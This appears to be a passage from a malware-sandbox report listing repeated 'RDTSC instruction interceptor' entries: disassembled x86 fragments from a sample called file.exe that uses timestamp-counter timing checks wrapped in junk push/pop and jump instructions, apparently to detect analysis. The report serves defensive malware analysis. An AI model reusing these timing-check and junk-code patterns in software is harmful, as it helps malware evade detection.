                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0B33 second address: 11D0B56 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6F31ADDF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6F31ADDF79h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0B56 second address: 11D0B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8C30 second address: 11D8C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8C3A second address: 11D8C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6F31405BDDh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8C4F second address: 11D8C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8C55 second address: 11D8C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9055 second address: 11D9059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBB7 second address: 11DDBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBBB second address: 11DDBC7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6F31ADDF66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBC7 second address: 11DDBD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F6F31405BD6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBD3 second address: 11DDBEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6F31ADDF6Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBEA second address: 11DDBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA995 second address: 11EA9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31ADDF72h 0x00000009 jnp 00007F6F31ADDF66h 0x0000000f ja 00007F6F31ADDF66h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA9BB second address: 11EA9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31405BE9h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA9DD second address: 11EA9F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA9F8 second address: 11EA9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA9FE second address: 11EAA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFC29 second address: 11FFC38 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6F31405BDAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFC38 second address: 11FFC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF812 second address: 11FF825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007F6F31405BDAh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF825 second address: 11FF829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A3A7 second address: 121A3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A3AD second address: 121A3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219213 second address: 1219218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121963C second address: 121966D instructions: 0x00000000 rdtsc 0x00000002 js 00007F6F31ADDF87h 0x00000008 jmp 00007F6F31ADDF74h 0x0000000d jmp 00007F6F31ADDF6Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F6F31ADDF66h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121966D second address: 121967C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121967C second address: 1219690 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6F31ADDF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F6F31ADDF6Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219BEB second address: 1219BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jne 00007F6F31405BDCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219DAD second address: 1219DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219DB5 second address: 1219DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F0A second address: 1219F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6F31ADDF66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F19 second address: 1219F29 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6F31405BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F29 second address: 1219F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F2D second address: 1219F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B9F4 second address: 121BA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F6F31ADDF66h 0x0000000c jmp 00007F6F31ADDF71h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6F31ADDF72h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E425 second address: 121E42C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E42C second address: 121E442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6F31ADDF6Ch 0x00000010 je 00007F6F31ADDF66h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E442 second address: 121E44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E6CA second address: 121E6D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6F31ADDF6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E6D4 second address: 121E6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31405BDDh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E6EA second address: 121E6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31ADDF6Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542001A second address: 5420069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6F31405BE1h 0x00000008 pop ecx 0x00000009 mov esi, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F6F31405BE8h 0x00000014 mov dword ptr [esp], ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6F31405BE7h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420069 second address: 542008E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542008E second address: 5420092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420092 second address: 5420096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420096 second address: 542009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400D78 second address: 5400D94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400D94 second address: 5400DAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400DAC second address: 5400E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov bl, ABh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007F6F31ADDF72h 0x00000013 mov bl, al 0x00000015 pop edi 0x00000016 pushfd 0x00000017 jmp 00007F6F31ADDF6Ch 0x0000001c xor ax, 7E88h 0x00000021 jmp 00007F6F31ADDF6Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F6F31ADDF75h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400E06 second address: 5400E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545019A second address: 54501A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54501A0 second address: 54501A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54501A4 second address: 54501C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d push eax 0x0000000e push edx 0x0000000f call 00007F6F31ADDF6Fh 0x00000014 pop ecx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54501C3 second address: 5450209 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6F31405BE9h 0x00000008 sub ax, AA56h 0x0000000d jmp 00007F6F31405BE1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6F31405BDDh 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450209 second address: 545020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0973 second address: 53E09F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, F0C2h 0x0000000f pushfd 0x00000010 jmp 00007F6F31ADDF73h 0x00000015 sub ah, FFFFFFBEh 0x00000018 jmp 00007F6F31ADDF79h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 jmp 00007F6F31ADDF6Eh 0x00000025 mov esi, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6F31ADDF6Dh 0x00000031 jmp 00007F6F31ADDF6Bh 0x00000036 popfd 0x00000037 push ecx 0x00000038 pop ebx 0x00000039 popad 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E09F2 second address: 53E0A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F6F31405BE7h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0A2C second address: 53E0A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0A32 second address: 53E0A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6FA2F4B524h 0x0000000f pushad 0x00000010 jmp 00007F6F31405BDEh 0x00000015 push eax 0x00000016 mov ebx, 42A2EBB4h 0x0000001b pop ebx 0x0000001c popad 0x0000001d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov dl, A2h 0x00000029 pushfd 0x0000002a jmp 00007F6F31405BDEh 0x0000002f or eax, 19260968h 0x00000035 jmp 00007F6F31405BDBh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0A8B second address: 53E0B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6F31ADDF6Ch 0x00000012 sub si, 46F8h 0x00000017 jmp 00007F6F31ADDF6Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e mov bx, ax 0x00000021 pushfd 0x00000022 jmp 00007F6F31ADDF72h 0x00000027 jmp 00007F6F31ADDF75h 0x0000002c popfd 0x0000002d popad 0x0000002e popad 0x0000002f je 00007F6FA3623811h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jmp 00007F6F31ADDF73h 0x0000003d mov ah, C7h 0x0000003f popad 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0B17 second address: 53E0B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31405BE1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0B2C second address: 53E0B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 movsx ebx, cx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0B41 second address: 53E0BD0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6F31405BE2h 0x00000008 add ecx, 479DD078h 0x0000000e jmp 00007F6F31405BDBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 jne 00007F6FA2F4B421h 0x0000001d jmp 00007F6F31405BE5h 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 pushad 0x00000026 mov di, cx 0x00000029 pushfd 0x0000002a jmp 00007F6F31405BE8h 0x0000002f or cx, B538h 0x00000034 jmp 00007F6F31405BDBh 0x00000039 popfd 0x0000003a popad 0x0000003b xchg eax, ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F6F31405BE5h 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547077F second address: 547079C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547079C second address: 54707AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31405BDCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54707AC second address: 54707B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54707B0 second address: 5470819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F6F31405BDAh 0x00000010 xor ecx, 48C8C508h 0x00000016 jmp 00007F6F31405BDBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F6F31405BE8h 0x00000022 adc ax, 6768h 0x00000027 jmp 00007F6F31405BDBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esp], ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 jmp 00007F6F31405BDBh 0x00000039 mov ecx, 086FB84Fh 0x0000003e popad 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54608F4 second address: 54608FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54608FA second address: 546093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F6F31405BDCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F6F31405BE0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6F31405BE7h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546093D second address: 5460943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400038 second address: 540004D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540004D second address: 5400051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400051 second address: 540005E instructions: 0x00000000 rdtsc 0x00000002 mov ax, 31F7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a movzx ecx, dx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540005E second address: 540008B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6F31ADDF75h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540008B second address: 54000A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2EDF2C92h 0x00000008 mov cx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54000A0 second address: 54000A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54000A6 second address: 54000AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460C2B second address: 5460C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460C31 second address: 5460CF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F31405BE0h 0x00000009 sub si, D688h 0x0000000e jmp 00007F6F31405BDBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F6F31405BE8h 0x0000001a and eax, 5C3E38E8h 0x00000020 jmp 00007F6F31405BDBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a pushad 0x0000002b mov edx, 702A718Ah 0x00000030 mov dx, 1C56h 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 pushad 0x0000003a pushad 0x0000003b mov ebx, ecx 0x0000003d push eax 0x0000003e pop edi 0x0000003f popad 0x00000040 pushfd 0x00000041 jmp 00007F6F31405BE0h 0x00000046 sbb si, 1678h 0x0000004b jmp 00007F6F31405BDBh 0x00000050 popfd 0x00000051 popad 0x00000052 mov eax, dword ptr [eax] 0x00000054 jmp 00007F6F31405BE9h 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d jmp 00007F6F31405BE1h 0x00000062 pop eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460CF5 second address: 5460CFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113945E second address: 1139464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1139464 second address: 113946E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6F31ADDF6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105A4 second address: 54105AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105AA second address: 54105AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105AE second address: 54105B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
